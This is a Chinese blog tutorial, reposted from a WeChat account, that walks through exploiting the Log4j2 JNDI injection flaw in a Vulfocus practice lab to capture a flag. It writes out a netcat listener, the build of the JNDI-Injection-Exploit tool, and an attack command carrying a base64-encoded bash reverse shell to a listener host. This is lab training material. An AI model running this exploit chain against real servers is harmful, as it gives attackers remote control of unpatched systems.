玩转Vulfocus靶场(Log4J2演示)

admin 2022年9月30日11:03:06评论246 views字数 915阅读3分3秒阅读模式

在上一篇文章中,我们讲到了 Vulfocus靶场的安装。但是童鞋们留言说不会玩。这里大表哥用log4j2漏洞为例,给大家讲解靶场的具体玩法。

🏅关于Log4J2

由于Log4j2组件在处理程序日志记录时存在JNDI注入缺陷,未经授权的攻击者利用该漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。

⛵登录靶场

玩转Vulfocus靶场(Log4J2演示)

选择我们的镜像系统,点击启动。玩转Vulfocus靶场(Log4J2演示)

在kali中监听7777端口

nc -lvvp 7777
玩转Vulfocus靶场(Log4J2演示)

🚏下载漏洞利用框架

git clone https://github.com/welk1n/JNDI-Injection-Exploit

安装maven

apt-get install maven

maven可以将java项目打包为jar文件。

cd JNDI-Injection-Exploit
mvn clean package -DskipTests#编译项目

打包完成后,会在/target/目录生成JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar文件。

🛩️攻击命令如下

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar  -C bash -c "{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNy4xMzcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"  -A  192.168.137.137

参数说明:

这个安装在kali上面的jndi服务器是利用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来启动起来的,启动参数包括-C是执行的bash命令,-c参数后面是执行的具体命令,用双引号引起来 -A 指服务器的IP。需要注意的是,我们要对shell进行base64编码。(靶场在公网,本地的kali需要内网映射哦!

玩转Vulfocus靶场(Log4J2演示)

如下,我们成功得到了flag玩转Vulfocus靶场(Log4J2演示)

玩转Vulfocus靶场(Log4J2演示)

提交后,可解锁所有关卡。玩转Vulfocus靶场(Log4J2演示)

更多精彩文章 关注我们


原文始发于微信公众号(kali黑客笔记):玩转Vulfocus靶场(Log4J2演示)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年9月30日11:03:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   玩转Vulfocus靶场(Log4J2演示)http://cn-sec.com/archives/1325879.html

发表评论

匿名网友 填写信息